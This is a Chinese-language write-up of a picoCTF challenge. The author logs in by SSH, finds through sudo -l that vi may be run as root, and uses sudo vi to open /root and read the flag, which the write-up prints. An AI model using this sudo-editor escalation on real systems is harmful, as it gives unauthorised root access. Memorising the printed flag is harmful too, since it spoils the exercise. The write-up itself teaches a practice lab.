看到題目，題目問我們是否能讀取到 root 裡的檔案，並且提示告訴我們可以注意一下我們有甚麼權限。

hint 1：What permissions do you have?

連上 webshell，首先先查看資料夾底下有甚麼，發現甚麼東西都沒有。

$ ssh -p 64096 picoplayer@saturn.picoctf.net
The authenticity of host '[saturn.picoctf.net]:49657 ([13.59.203.175]:49657)' can't be established.
ED25519 key fingerprint is SHA256:HKm/Bw1C+mhj23vO8tXULrgLFYvzP6gQH2IwgUiQTok.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[saturn.picoctf.net]:49657' (ED25519) to the list of known hosts.
picoplayer@saturn.picoctf.net's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 6.5.0-1023-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

picoplayer@challenge:~$ ls
picoplayer@challenge:~$ 

於是我們往上一層查看，到了 home 資料夾底下，並且看到一個資料夾名為 picoplayer，檢視 picoplayer，甚麼都沒有顯示，確認 picoplayer 是我們剛剛在的資料夾。

picoplayer@challenge:~$ cd ..
picoplayer@challenge:/home$ ls 
picoplayer
picoplayer@challenge:/home$ ls picoplayer/

再上上一層查找，發現到達根目錄，並且在根目錄中有題目提到的 root 的資料夾，還有很多其他的檔案。

picoplayer@challenge:/home$ cd ..
picoplayer@challenge:/$ ls -l
total 0
lrwxrwxrwx   1 root   root      7 Mar  8  2023 bin -> usr/bin
drwxr-xr-x   2 root   root      6 Apr 15  2020 boot
d---------   1 root   root     27 Aug  4  2023 challenge
drwxr-xr-x   5 root   root    340 Aug  3 15:24 dev
drwxr-xr-x   1 root   root     66 Aug  3 15:24 etc
drwxr-xr-x   1 root   root     24 Aug  4  2023 home
lrwxrwxrwx   1 root   root      7 Mar  8  2023 lib -> usr/lib
lrwxrwxrwx   1 root   root      9 Mar  8  2023 lib32 -> usr/lib32
lrwxrwxrwx   1 root   root      9 Mar  8  2023 lib64 -> usr/lib64
lrwxrwxrwx   1 root   root     10 Mar  8  2023 libx32 -> usr/libx32
drwxr-xr-x   2 root   root      6 Mar  8  2023 media
drwxr-xr-x   2 root   root      6 Mar  8  2023 mnt
drwxr-xr-x   2 root   root      6 Mar  8  2023 opt
dr-xr-xr-x 385 nobody nogroup   0 Aug  3 15:24 proc
drwx------   1 root   root     23 Aug  4  2023 root
drwxr-xr-x   1 root   root     54 Aug  3 15:25 run
lrwxrwxrwx   1 root   root      8 Mar  8  2023 sbin -> usr/sbin
drwxr-xr-x   2 root   root      6 Mar  8  2023 srv
dr-xr-xr-x  13 nobody nogroup   0 Aug  3 15:24 sys
drwxrwxrwt   1 root   root      6 Aug  4  2023 tmp
drwxr-xr-x   1 root   root     18 Mar  8  2023 usr
drwxr-xr-x   1 root   root     17 Mar  8  2023 var

由於 root 的權限是 rwx------，這代表只有 owner 有可以讀、寫、執行的權限，group 和 other 都沒有任何權限。

而因為我們沒有權限對 root 目錄任何事，我們試著使用 chmod 嘗試更改 root 的目錄權限，發現還是沒有辦法。

picoplayer@challenge:/$ chmod +x root
chmod: changing permissions of 'root': Operation not permitted

想到沒有權限，就想到是否可以使用 sudo 指令，因為 sudo 指令允許使用者以超級使用者（root）的權限執行程式或命令。

我們使用 sudo -i 和 sudo su 看是否能以 root 使用者身分登入，發現都沒有辦法。

( 補充 ： sudo -i 和 sudo su 差別在於，sudo -i 會模擬一個完整的登入過程，包括讀取 root 使用者的環境變數和設定檔，而 sudo su 就是單純切換到 root 用戶。 )

picoplayer@challenge:/$ sudo -i
[sudo] password for picoplayer:
Sorry, user picoplayer is not allowed to execute '/bin/bash' as root on challen
ge.
picoplayer@challenge:/$ sudo su
[sudo] password for picoplayer:
Sorry, user picoplayer is not allowed to execute '/usr/bin/su' as root on chall
enge.

於是我們使用 sudo -l，查看有什麼 sudo 指令是可以用的，發現可以使用 sudo vi 。

picoplayer@challenge:/$ sudo -l [sudo] password for picoplayer:
Matching Defaults entries for picoplayer on challenge: env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin\:/sbin:/b in:/snap/bin
User picoplayer may run the following commands on challenge: (ALL) /usr/bin/vi

知道能夠使用 sudo vi 後，我們輸入 sudo vi /root，讀取 root 裡的相關資料，並且再 root 中，發現有 flag.txt。

" ============================================================================ 
" Netrw Directory Listing (netrw v165) 
" /root 
" Sorted by name 
" Sort sequence: [/]$,<core%(.\d+)=>,.h$,.c$,.cpp$,~=*$,*,.o$, 
" Quick Help: :help -:go up dir D:delete R:rename s:sort-by x:specia " 
============================================================================= ../
./ 
.vim/ 
.bashrc 
.flag.txt 
.profile ~
~
~
~
~
~
~
~
~
~
~
~
~
"/" is a directory                                               8,1                All 

接著移動到 flag.txt 那行並點擊 enter ，就可以進入 flag.txt，得到 flag 的資訊了。

picoCTF{uS1ng_v1m_3dit0r_89e9cf1a} 
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
"/.flag.txt" 1L, 35C 1,1 All

小結：

學會 sudo -l 、sudo -i 、sudo su，以及使用 sudo vi <file> 。